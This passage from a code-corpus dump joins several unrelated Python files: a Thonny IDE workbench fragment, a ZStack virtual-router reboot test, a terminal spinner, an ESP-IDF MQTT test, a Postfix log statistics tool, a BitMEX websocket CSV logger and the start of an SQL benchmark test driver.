logging.debug("AFTER NEW REQUEST %s", client_socket)
def _poll_socket_requests(self) -> None:
"""runs in gui thread"""
try:
while not self._requests_from_socket.empty():
data = self._requests_from_socket.get()
args = ast.literal_eval(data.decode("UTF-8"))
assert isinstance(args, list)
for filename in args:
if os.path.isfile(filename):
self.get_editor_notebook().show_file(filename)
self.become_active_window()
finally:
self.after(50, self._poll_socket_requests)
def _on_close(self) -> None:
if not self.get_editor_notebook().check_allow_closing():
return
self._closing = True
try:
self._save_layout()
self._editor_notebook.remember_open_files()
self.event_generate("WorkbenchClose")
self._configuration_manager.save()
except Exception:
self.report_exception()
self.destroy()
self._destroyed = True
def _on_all_key_presses(self, event):
if running_on_windows():
ui_utils.handle_mistreated_latin_shortcuts(self._latin_shortcuts, event)
def _on_focus_in(self, event):
if self._lost_focus:
self._lost_focus = False
self.event_generate("WindowFocusIn")
def _on_focus_out(self, event):
if self.focus_get() is None:
if not self._lost_focus:
self._lost_focus = True
self.event_generate("WindowFocusOut")
def focus_get(self) -> Optional[tk.Widget]:
try:
return tk.Tk.focus_get(self)
except Exception:
# This may give error in Ubuntu
return None
def destroy(self) -> None:
try:
self._closing = True
# Tk clipboard gets cleared on exit and won't end up in system clipboard
# https://bugs.python.org/issue1207592
# https://stackoverflow.com/questions/26321333/tkinter-in-python-3-4-on-windows-dont-post-internal-clipboard-data-to-the-windo
try:
clipboard_data = self.clipboard_get()
if len(clipboard_data) < 1000 and all(
map(os.path.exists, clipboard_data.splitlines())
):
# Looks like the clipboard contains file name(s)
# Most likely this means actual file cut/copy operation
# was made outside of Thonny.
# Don't want to replace this with simple string data of file names.
pass
else:
copy_to_clipboard(clipboard_data)
except Exception:
pass
tk.Tk.destroy(self)
except tk.TclError:
logging.exception("Error while destroying workbench")
finally:
runner = get_runner()
if runner != None:
runner.destroy_backend()
def _on_configure(self, event) -> None:
# called when window is moved or resized
if (
hasattr(self, "_maximized_view") # configure may happen before the attribute is defined
and self._maximized_view # type: ignore
):
# grid again, otherwise it acts weird
self._maximized_view.grid(
row=1, column=0, sticky=tk.NSEW, in_=self._maximized_view.master # type: ignore
)
def _on_tk_exception(self, exc, val, tb) -> None:
# copied from tkinter.Tk.report_callback_exception with modifications
# see http://bugs.python.org/issue22384
sys.last_type = exc
sys.last_value = val
sys.last_traceback = tb
self.report_exception()
def report_exception(self, title: str = "Internal error") -> None:
logging.exception(title)
if tk._default_root and not self._closing: # type: ignore
(typ, value, _) = sys.exc_info()
assert typ is not None
if issubclass(typ, UserError):
msg = str(value)
else:
msg = traceback.format_exc()
dlg = ui_utils.LongTextDialog(title, msg, parent=self)
ui_utils.show_dialog(dlg, self)
def _open_views(self) -> None:
for nb_name in self._view_notebooks:
view_name = self.get_option("layout.notebook_" + nb_name + "_visible_view")
if view_name != None:
if view_name == "GlobalsView":
# was renamed in 2.2b5
view_name = "VariablesView"
if self.get_ui_mode() != "simple" or view_name in SIMPLE_MODE_VIEWS:
self.show_view(view_name)
# make sure VariablesView is at least loaded
# otherwise it may miss globals events
# and will show empty table on open
self.get_view("VariablesView")
if (
self.get_option("assistance.open_assistant_on_errors")
or self.get_option("assistance.open_assistant_on_warnings")
) and (self.get_ui_mode() != "simple" or "AssistantView" in SIMPLE_MODE_VIEWS):
self.get_view("AssistantView")
def _save_layout(self) -> None:
self.update_idletasks()
self.set_option("layout.zoomed", ui_utils.get_zoomed(self))
for nb_name in self._view_notebooks:
widget = self._view_notebooks[nb_name].get_visible_child()
if hasattr(widget, "maximizable_widget"):
view = widget.maximizable_widget
view_name = type(view).__name__
self.set_option("layout.notebook_" + nb_name + "_visible_view", view_name)
else:
self.set_option("layout.notebook_" + nb_name + "_visible_view", None)
if not ui_utils.get_zoomed(self) or running_on_mac_os():
# can't restore zoom on mac without setting actual dimensions
gparts = re.findall(r"\d+", self.wm_geometry())
self.set_option("layout.width", int(gparts[0]))
self.set_option("layout.height", int(gparts[1]))
self.set_option("layout.left", int(gparts[2]))
self.set_option("layout.top", int(gparts[3]))
self.set_option("layout.west_pw_width", self._west_pw.preferred_size_in_pw)
self.set_option("layout.east_pw_width", self._east_pw.preferred_size_in_pw)
for key in ["nw", "sw", "s", "se", "ne"]:
self.set_option(
"layout.%s_nb_height" % key, self._view_notebooks[key].preferred_size_in_pw
)
def update_title(self, event=None) -> None:
editor = self.get_editor_notebook().get_current_editor()
if self._is_portable:
title_text = "Portable Thonny"
else:
title_text = "Thonny"
if editor != None:
title_text += " - " + editor.get_long_description()
self.title(title_text)
def become_active_window(self, force=True) -> None:
# Looks like at least on Windows all of the following is required
# for ensuring the window gets focus
# (deiconify, ..., iconify, deiconify)
self.deiconify()
if force:
self.attributes("-topmost", True)
self.after_idle(self.attributes, "-topmost", False)
self.lift()
if not running_on_linux():
# http://stackoverflow.com/a/13867710/261181
self.iconify()
self.deiconify()
editor = self.get_editor_notebook().get_current_editor()
if editor is not None:
# This method is meant to be called when a new file is opened, so it's safe to
# send the focus to the editor
editor.focus_set()
else:
self.focus_set()
def open_url(self, url):
m = re.match(r"^thonny-editor://(.*?)(#(\d+)(:(\d+))?)?$", url)
if m is not None:
filename = m.group(1).replace("%20", " ")
lineno = None if m.group(3) is None else int(m.group(3))
col_offset = None if m.group(5) is None else int(m.group(5))
if lineno is None:
self.get_editor_notebook().show_file(filename)
else:
self.get_editor_notebook().show_file_at_line(filename, lineno, col_offset)
return
m = re.match(r"^thonny-help://(.*?)(#(.+))?$", url)
if m is not None:
topic = m.group(1)
fragment = m.group(3)
self.show_view("HelpView").load_topic(topic, fragment)
return
if url.endswith(".rst") and not url.startswith("http"):
parts = url.split("#", maxsplit=1)
topic = parts[0][:-4]
if len(parts) == 2:
fragment = parts[1]
else:
fragment = None
self.show_view("HelpView").load_topic(topic, fragment)
return
# Fallback
webbrowser.open(url, False, True)
def open_help_topic(self, topic, fragment=None):
self.show_view("HelpView").load_topic(topic, fragment)
def bell(self, displayof=0):
if not self.get_option("general.disable_notification_sound"):
super().bell(displayof=displayof)
def _mac_quit(self, *args):
self._on_close()
def get_toolbar(self):
return self._toolbar
class WorkbenchEvent(Record):
def __init__(self, sequence: str, **kwargs) -> None:
Record.__init__(self, **kwargs)
self.sequence = sequence
|
test_ping_vms_reboot_vr.py
|
'''
1. Create 2 Test VMs with VR.
2. After 2 VMs created, reboot VR.
3. After VR reboot completed, check 2 VMs status
4. ping VM2 from VM1
@author: Youyk
'''
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.test_state as test_state
import zstackwoodpecker.operations.vm_operations as vm_ops
import threading
import time
_config_ = {
'timeout' : 1000,
'noparallel' : True
}
test_stub = test_lib.lib_get_test_stub()
test_obj_dict = test_state.TestStateDict()
def test():
test_util.test_dsc('Create test vm1 and check')
vm1 = test_stub.create_vlan_vm()
test_obj_dict.add_vm(vm1)
test_util.test_dsc('Create test vm2 and check')
vm2 = test_stub.create_vlan_vm()
test_obj_dict.add_vm(vm2)
vm1.check()
vm2.check()
vrs = test_lib.lib_find_vr_by_vm(vm1.vm)
if len(vrs) != 1:
test_util.test_logger('more than 1 VR found for vm1: %s. Will test the 1st one: %s.' % (vm1.vm.uuid, vrs[0].uuid))
vr = vrs[0]
vr_mgmt_ip = test_lib.lib_find_vr_mgmt_ip(vr)
if not test_lib.lib_check_testagent_status(vr_mgmt_ip):
test_util.test_fail('vr: %s is not reachable, since can not reach its test agent. Give up test and test failure. ' % vr.uuid)
test_lib.lib_install_testagent_to_vr_with_vr_vm(vr)
#Need to put the vr reboot into a thread, since the vr reboot API is a sync API.
thread = threading.Thread(target=vm_ops.reboot_vm, args=(vr.uuid,))
thread.start()
#check the vr test agent service port (7272)
if not test_lib.lib_wait_target_down(vr_mgmt_ip, '7272', 60):
test_util.test_fail('vr: %s is not shutdown in 60 seconds. Fail to reboot it. ' % vr.uuid)
if not test_lib.lib_wait_target_up(vr_mgmt_ip, '7272', 120):
test_util.test_fail('vr: %s is not startup in 120 seconds. Fail to reboot it. ' % vr.uuid)
#avoid possible apt conflicts between installing testagent and appliancevm
#time.sleep(60)
vm1.check()
vm2.check()
test_util.test_dsc('Ping from vm1 to vm2.')
test_lib.lib_check_ping(vm1.vm, vm2.vm.vmNics[0].ip)
vm1.destroy()
vm2.destroy()
test_util.test_pass('Create vlan VirtualRouter VM (and reboot VR after VM created) Test with snat ping between two VMs Success')
#Will be called only if exception happens in test().
def error_cleanup():
test_lib.lib_error_cleanup(test_obj_dict)
|
spinner.py
|
# Copyright 2020 The Pigweed Authors
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""Spinner!"""
import contextlib
import os
import sys
import threading
import time
class Spinner(object): # pylint: disable=useless-object-inheritance
"""Spinner!"""
def __init__(self, quiet=False):
self._done = None
self._thread = None
self._quiet = quiet
def _disabled(self):
if os.environ.get('PW_ENVSETUP_DISABLE_SPINNER'):
return True
if os.environ.get('PW_ENVSETUP_QUIET'):
return True
if self._quiet:
return True
if not sys.stdout.isatty():
return True
return False
def __del__(self):
self._done = True
def _spin(self):
i = 0
chars = '|/-\\'
while not self._done:
sys.stdout.write('[{}]'.format(chars[i]))
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('\b\b\b')
i = (i + 1) % len(chars)
def start(self):
if self._disabled():
return
self._done = False
self._thread = threading.Thread(target=self._spin)
self._thread.start()
def stop(self):
if self._disabled():
return
assert self._thread
self._done = True
self._thread.join()
self._thread = None
@contextlib.contextmanager
def __call__(self):
try:
self.start()
yield self
finally:
self.stop()
@contextlib.contextmanager
def pause(self):
try:
self.stop()
yield self
finally:
self.start()
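# Minimal usage sketch (not part of the original module); the context-manager style
# below follows __call__ and pause above, and the work inside is hypothetical:
#
#   spinner = Spinner()
#   with spinner():
#       do_slow_setup()  # spinner animates while this runs
#       with spinner.pause():
#           print('output that should not be garbled by the spinner')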
|
mqtt_tcp_example_test.py
|
import os
import re
import socket
import struct
import sys
import time
from threading import Thread
import ttfw_idf
from tiny_test_fw import DUT
msgid = -1
def get_my_ip():
s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s1.connect(('8.8.8.8', 80))
my_ip = s1.getsockname()[0]
s1.close()
return my_ip
def mqqt_server_sketch(my_ip, port):
global msgid
print('Starting the server on {}'.format(my_ip))
s = None
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(60)
s.bind((my_ip, port))
s.listen(1)
q,addr = s.accept()
q.settimeout(30)
print('connection accepted')
except Exception:
print('Local server on {}:{} listening/accepting failure: {}. '
'Possibly check permissions or firewall settings '
'to accept connections on this address'.format(my_ip, port, sys.exc_info()[0]))
raise
data = q.recv(1024)
# the first packet received above should be the client's CONNECT
print('received from client {}'.format(data))
data = bytearray([0x20, 0x02, 0x00, 0x00])  # minimal CONNACK (connection accepted)
q.send(data)
# receive the QoS1 PUBLISH and extract its packet (message) id
data = q.recv(1024)
msgid = struct.unpack('>H', data[15:17])[0]
print('received from client {}, msgid: {}'.format(data, msgid))
data = bytearray([0x40, 0x02, data[15], data[16]])  # PUBACK echoing the packet id
q.send(data)
time.sleep(5)
s.close()
print('server closed')
@ttfw_idf.idf_example_test(env_tag='Example_EthKitV1')
def test_examples_protocol_mqtt_qos1(env, extra_data):
global msgid
"""
steps: (QoS1: Happy flow)
1. start the broker broker (with correctly sending ACK)
2. DUT client connects to a broker and publishes qos1 message
3. Test evaluates that qos1 message is queued and removed from queued after ACK received
4. Test the broker received the same message id evaluated in step 3
"""
dut1 = env.get_dut('mqtt_tcp', 'examples/protocols/mqtt/tcp', dut_class=ttfw_idf.ESP32DUT)
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, 'mqtt_tcp.bin')
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('mqtt_tcp_bin_size', '{}KB'.format(bin_size // 1024))
# 1. start mqtt broker sketch
host_ip = get_my_ip()
thread1 = Thread(target=mqqt_server_sketch, args=(host_ip,1883))
thread1.start()
# 2. start the dut test and wait till client gets IP address
dut1.start_app()
# waiting for getting the IP address
try:
ip_address = dut1.expect(re.compile(r' eth ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
print('writing to device: {}'.format('mqtt://' + host_ip + '\n'))
dut1.write('mqtt://' + host_ip + '\n')
thread1.join()
print('Message id received from server: {}'.format(msgid))
# 3. check the message id was enqueued and then deleted
msgid_enqueued = dut1.expect(re.compile(r'OUTBOX: ENQUEUE msgid=([0-9]+)'), timeout=30)
msgid_deleted = dut1.expect(re.compile(r'OUTBOX: DELETED msgid=([0-9]+)'), timeout=30)
# 4. check the msgid of received data are the same as that of enqueued and deleted from outbox
if (msgid_enqueued[0] == str(msgid) and msgid_deleted[0] == str(msgid)):
print('PASS: Received correct msg id')
else:
print('Failure!')
raise ValueError('Mismatch of msgid: received: {}, enqueued {}, deleted {}'.format(msgid, msgid_enqueued, msgid_deleted))
if __name__ == '__main__':
test_examples_protocol_mqtt_qos1()
|
postfix_stats.py
|
#!/usr/bin/env python
"""
postfix_stats.py
~~~~~~~~
:copyright: (c) 2012 DISQUS.
:license: Apache License 2.0, see LICENSE for more details.
"""
import fileinput
import json
import logging
import re
import SocketServer
import sys
from collections import defaultdict, Iterator
from optparse import OptionParser
from Queue import Queue, Full
from threading import Thread, Lock
logging.basicConfig(level=logging.ERROR)
logger = logging.getLogger('postfix_stats')
handlers = defaultdict(list)
stats = {}
stats['recv'] = {
'relay_status': defaultdict(lambda: defaultdict(int)),
'status': defaultdict(int),
'resp_codes': defaultdict(int),
}
stats['send'] = {
'relay_status': defaultdict(lambda: defaultdict(int)),
'status': defaultdict(int),
'resp_codes': defaultdict(int),
}
stats['in'] = {
'status': defaultdict(int),
'resp_codes': defaultdict(int),
}
stats['relay_clients'] = defaultdict(lambda: defaultdict(int))
stats['clients'] = defaultdict(int)
stats['local'] = defaultdict(int)
local_addresses = {}
class Handler(object):
filter_re = re.compile(r'(?!)')  # never-matching placeholder; subclasses override this
facilities = None
component = None
handle_lock = Lock()
def __init__(self, *args, **kwargs):
assert isinstance(self.filter_re, re._pattern_type)
self.facilities = set(self.facilities)
self.register(self.facilities)
@classmethod
def parse(self, line):
pline = self.filter_re.match(line['message'])
if pline:
logger.debug(pline.groupdict())
with self.handle_lock:
self.component = line['component']
self.handle(**pline.groupdict())
@classmethod
def handle(self, **kwargs):
raise NotImplementedError()
def register(self, facilities):
facilities = set(facilities)
for facility in facilities:
if self not in handlers[facility]:
handlers[facility].append(self)
self.facilities |= facilities
class BounceHandler(Handler):
facilities = set(['bounce'])
filter_re = re.compile((r'\A(?P<message_id>\w+?): sender non-delivery notification: (?P<bounce_message_id>\w+?)\Z'))
@classmethod
def handle(self, message_id=None, bounce_message_id=None):
pass
class CleanupHandler(Handler):
facilities = set(['cleanup'])
filter_re = re.compile(r'\A(?P<message_id>\w+?): message-id=\<(?P<ext_message_id>.+?)\>\Z')
@classmethod
def handle(self, message_id=None, ext_message_id=None):
pass
class LocalHandler(Handler):
facilities = set(['local'])
filter_re = re.compile(r'\A(?P<message_id>\w+?): to=\<(?P<to_email>.*?)\>, orig_to=\<(?P<orig_to_email>.*?)\>, relay=(?P<relay>.+?), delay=(?P<delay>[0-9\.]+), delays=(?P<delays>[0-9\.\/]+), dsn=(?P<dsn>[0-9\.]+), status=(?P<status>\w+) \((?P<response>.+?)\)\Z')
local_addresses_re = re.compile(r'(?!)')
def __init__(self, local_addresses_re=None, *args, **kwargs):
super(LocalHandler, self).__init__(*args, **kwargs)
if local_addresses_re:
assert isinstance(local_addresses_re, re._pattern_type)
self.__class__.local_addresses_re = local_addresses_re
@classmethod
def handle(self, message_id=None, to_email=None, orig_to_email=None, relay=None, delay=None, delays=None, dsn=None, status=None, response=None):
pemail = self.local_addresses_re.search(to_email)
if pemail:
search = pemail.group(1)
name, count = local_addresses[search]
logger.debug('Local address <%s> count (%s) as "%s"', search, count, name)
stats['local'][name] += 1
if count:
stats['in']['status'][status] += 1
stats['in']['resp_codes'][dsn] += 1
class QmgrHandler(Handler):
facilities = set(['qmgr'])
filter_re = re.compile(r'\A(?P<message_id>\w+?): (?:(?P<removed>removed)|(?:from=\<(?P<from_address>.*?)\>, size=(?P<size>[0-9]+), nrcpt=(?P<nrcpt>[0-9]+) \(queue (?P<queue>[a-z]+)\)))?\Z')
@classmethod
def handle(self, message_id=None, removed=None, from_address=None, size=None, nrcpt=None, queue=None):
pass
class SmtpHandler(Handler):
facilities = set(['smtp', 'error'])
filter_re = re.compile(r'\A(?P<message_id>\w+?): to=\<(?P<to_email>.+?)\>, relay=(?P<relay>.+?), (?:conn_use=(?P<conn_use>\d), )?delay=(?P<delay>[0-9\.]+), delays=(?P<delays>[0-9\.\/]+), dsn=(?P<dsn>[0-9\.]+), status=(?P<status>\w+) \((?P<response>.+?)\)\Z')
@classmethod
def handle(self, message_id=None, to_email=None, relay=None, conn_use=None, delay=None, delays=None, dsn=None, status=None, response=None):
stat = 'recv' if '127.0.0.1' in relay else 'send'
if self.component is None:
stats[stat]['status'][status] += 1
else:
stats[stat]['relay_status'][self.component][status] += 1
stats[stat]['resp_codes'][dsn] += 1
class SmtpdHandler(Handler):
facilities = set(['smtpd'])
filter_re = re.compile(r'\A(?P<message_id>\w+?): client=(?P<client_hostname>[.\w-]+)\[(?P<client_ip>[A-Fa-f0-9.:]{3,39})\](?:, sasl_method=[\w-]+)?(?:, sasl_username=[-_.@\w]+)?(?:, sasl_sender=\S)?(?:, orig_queue_id=\w+)?(?:, orig_client=(?P<orig_client_hostname>[.\w-]+)\[(?P<orig_client_ip>[A-Fa-f0-9.:]{3,39})\])?\Z')
@classmethod
def handle(self, message_id=None, client_hostname=None, client_ip=None, orig_client_hostname=None, orig_client_ip=None):
ip = orig_client_ip or client_ip
if self.component is None:
stats['clients'][ip] += 1
else:
stats['relay_clients'][self.component][ip] += 1
class Parser(Thread):
line_re = re.compile(r'\A(?P<iso_date>\D{3}\s+\d{1,2}\s+\d{2}:\d{2}:\d{2})\s+(?P<source>.+?)\s+(?P<facility>.+?)\[(?P<pid>\d+?)\]:\s(?P<message>.*)\Z')
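    # Illustrative syslog line matched by line_re (hostname and queue id are hypothetical):
    #   Oct  3 12:00:01 mailhost postfix/smtp[1234]: 4F2A1B: to=<user@example.com>, relay=..., status=sent (...)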
def __init__(self, lines):
super(Parser, self).__init__()
self.lines = lines
self.daemon = True
self.start()
def run(self):
while True:
line = self.lines.get()
try:
self.parse_line(line)
            except Exception:
logger.exception('Error parsing line: %s', line)
finally:
self.lines.task_done()
def parse_line(self, line):
pln = self.line_re.match(line)
if pln:
pline = pln.groupdict()
logger.debug(pline)
component, facility = pline['facility'].split('/')
component = component.replace('postfix-', '') if relay_mode else None
pline['component'] = component
for handler in handlers[facility]:
handler.parse(pline)
class ParserPool(object):
def __init__(self, num_parsers):
self.lines = Queue(num_parsers * 1000)
for i in xrange(num_parsers):
logger.info('Starting parser %s', i)
Parser(self.lines)
def add_line(self, line, block=False):
self.lines.put(line, block)
def join(self):
self.lines.join()
class CommandHandler(SocketServer.StreamRequestHandler):
def handle(self):
command = self.rfile.readline().strip()
logger.info('Got command: %s', command)
if command.lower() == 'stats':
self.wfile.write(json.dumps(stats))
elif command.lower() == 'prettystats':
self.wfile.write(json.dumps(stats, indent=2))
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
pass
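# Illustrative way to query the daemon once it is running with --daemon
# (assumes a netcat-style client is available):
#   printf 'stats\n' | nc 127.0.0.1 7777
#   printf 'prettystats\n' | nc 127.0.0.1 7777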
class StdinReader(Iterator):
def next(self):
try:
line = sys.stdin.readline()
except KeyboardInterrupt:
raise StopIteration
if not line:
raise StopIteration
return line
def isstdin(self):
return True
def main(logs, daemon=False, host='127.0.0.1', port=7777, concurrency=2, local_emails=None, **kwargs):
true_values = ['yes', '1', 'true']
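    # Each --local/-l value is a LOCAL_TUPLE of the form STRING,NAME,COUNT,
    # e.g. (hypothetical): --local 'billing@,billing,yes'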
for local_email in local_emails:
try:
search, name, count = local_email.strip('()').split(',')
except ValueError:
logger.error('LOCAL_TUPLE requires 3 fields: %s', local_email)
return -1
local_addresses[search] = (name, count.lower() in true_values)
if local_addresses:
local_addresses_re = re.compile(r'(%s)' % '|'.join(local_addresses.keys()))
logger.debug('Local email pattern: %s', local_addresses_re.pattern)
else:
local_addresses_re = re.compile(r'(?!)')
handlers = (LocalHandler(local_addresses_re), SmtpHandler(), SmtpdHandler())
if daemon:
server = ThreadedTCPServer((host, port), CommandHandler)
server_thread = Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
logger.info('Listening on %s:%s', host, port)
parser_pool = ParserPool(concurrency)
    if not logs or logs[0] == '-':
reader = StdinReader()
else:
reader = fileinput.input(logs)
for line in reader:
try:
parser_pool.add_line(line.strip('\n'), not reader.isstdin())
except Full:
logger.warning('Line parser queue full')
            # Don't really care
pass
parser_pool.join()
if not daemon:
print json.dumps(stats, indent=2)
else:
server.shutdown()
return 0
if __name__ == '__main__':
global relay_mode
usage = "usage: %prog [options] file1 file2 ... fileN"
opt_parser = OptionParser(usage)
opt_parser.add_option("-v", "--verbose", dest="verbosity", default=0, action="count",
help="-v for a little info, -vv for debugging")
opt_parser.add_option("-d", "--daemon", dest="daemon", default=False, action="store_true",
help="Run tcp server for getting stats from")
opt_parser.add_option("-p", "--port", dest="port", default=7777, type="int",
help="Port to listen on for grabbing stats", metavar="PORT")
opt_parser.add_option("-i", "--host", dest="host", default="127.0.0.1",
help="Host/IP to listen on for grabbing stats", metavar="HOST")
opt_parser.add_option("-c", "--concurrency", dest="concurrency", default=2, type="int",
help="Number of threads to spawn for handling lines", metavar="NUM")
opt_parser.add_option("-l", "--local", dest="local_emails", default=[], action="append",
help="Search for STRING in incoming email addresses and incr stat NAME and if COUNT, count in incoming - STRING,NAME,COUNT", metavar="LOCAL_TUPLE")
opt_parser.add_option("-r", "--relay-mode", dest="relay", default=False, action="store_true",
help="Activate the aggregator in relay-mode")
(options, args) = opt_parser.parse_args()
if options.verbosity == 1:
logger.setLevel(logging.INFO)
elif options.verbosity == 2:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.ERROR)
relay_mode = options.relay
sys.exit(main(args, **options.__dict__))
|
ws.py
|
import websocket
import threading
import traceback
from time import sleep
import json
import logging
import urllib
import math
from logging.handlers import RotatingFileHandler
from datetime import datetime as dt
import csv
import os
DATA_DIR = 'data/'
MAX_TABLE_LEN = 200
def setup_db(name, extension='.csv'):
"""Setup writer that formats data to csv, supports multiple instances with no overlap."""
formatter = logging.Formatter(fmt='%(asctime)s,%(message)s', datefmt='%d-%m-%y,%H:%M:%S')
date = dt.today().strftime('%Y-%m-%d')
db_path = str(DATA_DIR + name + '/' + name + '_' + date + extension)
handler = RotatingFileHandler(db_path, backupCount=1)
handler.setFormatter(formatter)
logger = logging.getLogger(name)
logger.setLevel(logging.INFO)
logger.addHandler(handler)
return logger
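# Illustrative CSV row produced through a logger returned by setup_db()
# (field values are hypothetical):
#   03-10-21,12:00:00,orderID, XBTUSD, Sell, 42000, 1000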
class BitMEXWebsocket:
def __init__(self, wsURL = 'wss://www.bitmex.com/realtime?subscribe=liquidation:XBTUSD,announcement,trade'):
'''Connect to the websocket and initialize data stores.'''
self.logger = logging.getLogger(__name__)
self.logger.debug("Initializing WebSocket.")
self.data = {}
self.keys = {}
self.exited = False
self.liquidation_logger = setup_db('liquidation')
self.announcement_logger = setup_db('announcement')
self.logger.info("Connecting to %s" % wsURL)
self.__connect(wsURL)
self.logger.info('Connected to WS.')
sleep(2)
self.logger.info('Starting...')
sleep(1)
def reset(self):
self.logger.warning('Websocket resetting...')
self.ws.close()
self.liquidation_logger.removeHandler(self.liquidation_logger.handlers[0])
self.announcement_logger.removeHandler(self.announcement_logger.handlers[0])
        self.logger.info('Websocket closed.')
self.logger.info('Restarting...')
self.__init__()
def __connect(self, wsURL):
'''Connect to the websocket in a thread.'''
self.logger.debug("Starting thread")
self.ws = websocket.WebSocketApp(wsURL,
on_message=self.__on_message,
on_close=self.__on_close,
on_open=self.__on_open,
on_error=self.__on_error
)
self.wst = threading.Thread(target=lambda: self.ws.run_forever())
self.wst.daemon = True
self.wst.start()
self.logger.debug("Started thread")
# Wait for connect before continuing
conn_timeout = 5
while (not self.ws.sock or not self.ws.sock.connected) and conn_timeout:
sleep(1)
conn_timeout -= 1
if not conn_timeout:
self.logger.error("Couldn't connect to WS! Exiting.")
self.reset()
def __on_message(self, message):
'''Handler for parsing WS messages.'''
message = json.loads(message)
# If day changes, restart
liq_path = str(DATA_DIR + 'liquidation/liquidation' + '_' + dt.today().strftime('%Y-%m-%d') + '.csv')
ann_path = str(DATA_DIR + 'announcements/announcements' + '_' + dt.today().strftime('%Y-%m-%d') + '.csv')
if not(os.path.exists(liq_path) or os.path.exists(ann_path)):
self.reset()
# self.liquidation_logger.removeHandler(self.liquidation_logger.handlers[0])
# self.announcement_logger.removeHandler(self.announcement_logger.handlers[0])
# self.liquidation_logger = setup_db('liquidation')
# self.announcement_logger = setup_db('announcement')
table = message['table'] if 'table' in message else None
action = message['action'] if 'action' in message else None
try:
if 'subscribe' in message:
if message['success']:
self.logger.debug("Subscribed to %s." % message['subscribe'])
else:
                    self.logger.error("Unable to subscribe to %s. Error: \"%s\"" %
                                      (message['request']['args'][0], message['error']))
elif action:
if table not in self.data:
self.data[table] = []
elif action == 'insert':
self.logger.debug('%s: inserting %s' % (table, message['data']))
self.data[table] += message['data']
if table == 'liquidation':
data = message['data'][0]
self.liquidation_logger.info('%s, %s, %s, %s, %s' % (data['orderID'], data['symbol'],
data['side'], data['price'], data['leavesQty']))
elif table == 'announcement':
data = message['data'][0]
self.announcement_logger.info(' %s, %s, %s' %
(data['id'],data['link'], data['title']))
if len(self.data[table]) > MAX_TABLE_LEN:
self.data[table] = self.data[table][MAX_TABLE_LEN // 2:]
except:
self.logger.error(traceback.format_exc())
def __on_error(self, error):
'''Called on fatal websocket errors. We exit on these.'''
if not self.exited:
self.logger.error("Error : %s" % error)
raise websocket.WebSocketException(error)
        self.logger.error('Websocket Error, resetting...')
        self.reset()
def __on_open(self):
'''Called when the WS opens.'''
self.logger.debug("Websocket Opened.")
def __on_close(self):
'''Called on websocket close.'''
self.logger.info('Websocket Closed')
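# Minimal usage sketch (assumption: not part of the original module; the
# data/liquidation and data/announcement directories must already exist so
# setup_db() can open its CSV files):
if __name__ == '__main__':
    ws = BitMEXWebsocket()
    while True:
        sleep(1)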
|
p3_test_sql.py
|
#
# Copyright (c) Dell Inc., or its subsidiaries. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
from __future__ import division
import datetime
import logging
import multiprocessing
import random
import re
import sys
import uuid
import queue as Queue
# P3 Libraries
from p3_test_driver import p3_plugin_manager
from p3_test_driver.hadoop_util import kill_all_yarn_jobs, kill_yarn_job
from p3_test_driver.p3_test import TimeoutException
from p3_test_driver.p3_test_hadoop import HadoopTest
from p3_test_driver.p3_util import regex_first_group, record_result, read_file_to_string, glob_file_list
from p3_test_driver.system_command import system_command, time_duration_to_seconds
_default_configs = {
'sqlbatch': {
'queries_per_stream': 0,
'random_seed': 0,
'stream_count': 1,
}
}
class PluginInfo(p3_plugin_manager.IP3Plugin):
def get_plugin_info(self):
return [
{
'class_type': 'test',
'class_name': 'sqlquery',
'class': SqlQueryTest,
},
{
'class_type': 'test',
'class_name': 'sqlbatch',
'class': SqlBatchTest,
},
]
class SqlTest(HadoopTest):
def __init__(self, test_config, default_configs=_default_configs):
super(SqlTest, self).__init__(test_config, default_configs=default_configs)
def configure_environment(self):
config = self.test_config
super(SqlTest, self).configure_environment()
db_type = config['db_type']
if db_type == 'hawq':
if config.get('restart_hawq',False):
system_command('/etc/init.d/hawq stop')
system_command('/etc/init.d/hawq start')
elif db_type == 'impala':
cmd = []
cmd.extend(['impala-shell'])
cmd.extend(['--impalad', '%s:%d' % (config.get('impalad_host','localhost'), config.get('impalad_port',21000))])
cmd.extend(['--database', self.db_name()])
cmd.extend(['-q', 'invalidate metadata'])
system_command(cmd,
print_command=True,
print_output=True,
raise_on_error=True,
shell=False)
def db_name(self):
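        # db_name may contain %-style placeholders that are filled in from the
        # test config, e.g. (hypothetical): 'tpcds_%(scale_factor)s'.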
config = self.test_config
return config['db_name'] % config
class SqlQueryTest(SqlTest):
def __init__(self, test_config, default_configs=_default_configs):
super(SqlQueryTest, self).__init__(test_config, default_configs=default_configs)
def run_test(self):
config = self.test_config
# If run in the optimizer, we don't want to run much longer than the best sample.
if config.get('optimizer_set_timeout') and 'optimizer_best_query_elapsed_sec_mean' in config and 'optimizer_best_query_elapsed_sec_std' in config:
max_query_elapsed_sec = config['optimizer_best_query_elapsed_sec_mean'] + 3*config['optimizer_best_query_elapsed_sec_std']
config['command_timeout_sec'] = 30.0 + max_query_elapsed_sec
logging.info('SqlQueryTest.run_test: Setting command timeout to %0.0f seconds' % config['command_timeout_sec'])
config['_status_node'].set_status('Running query %s' % config['query_filename'])
self.hadoop_authenticate()
self.configure_environment()
with self.metrics_collector_context():
self.start_metrics()
rec = run_query(config)
record_result(rec, rec['result_filename'])
if rec['command_timed_out']:
